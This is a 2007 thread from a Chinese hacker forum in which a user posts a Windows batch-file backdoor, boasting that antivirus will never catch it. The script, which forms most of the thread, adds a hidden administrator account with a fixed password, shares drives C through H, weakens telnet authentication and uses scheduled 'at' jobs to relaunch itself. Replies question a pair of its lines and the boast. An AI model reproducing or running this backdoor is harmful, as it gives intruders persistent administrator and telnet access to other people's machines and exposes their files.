黑色海岸线论坛 - Powered by Discuz! Board

标题: [讨论] 用批处理写的后门永不被杀 [打印本页]

作者: chinanic 时间: 2007-6-1 01:51 标题: 用批处理写的后门永不被杀

这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了，代码如下：
  @echo off
  @attrib +s + r xyt.bat
  @net user xyt hacker /add
  @net localgroup administrators xyt /add
  @net share c$=c:
  @net share d$=d:
  @net share e$=e:
  @net share f$=f:
  @net share g$=g:
  @net share h$=h:
  @tlntadmn config sec = -ntlm

  @net stop schedule
  @net start Schedule
  @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
  @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
  @at 11:05 c:\WINNT\SYSTEM32\xyt.bat
  @at 23:05 c:\WINNT\SYSTEM32\xyt.bat
  @net stop telnet
  @net start telnet
  @exit

  这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~
  运行后TELNET IP上去，用户名为xyt，密码为hacker。

#######################################
这种做后门的思想不错，但想了很久，还是不明白为什么要加
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
这两句，XP SP2下没有找到log.bat ，又找了几台WIN2000的机子，SYSTEM32下也没有找到log.bat
百思不得其解……

作者: baobaobruse 时间: 2007-6-1 17:46

永不被杀?,,,,,这么厉害?

作者: chinanic 时间: 2007-6-2 01:01

话是说绝对了点，但你仔细看内容的话。就会明白，这种说法并不算太过份。

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)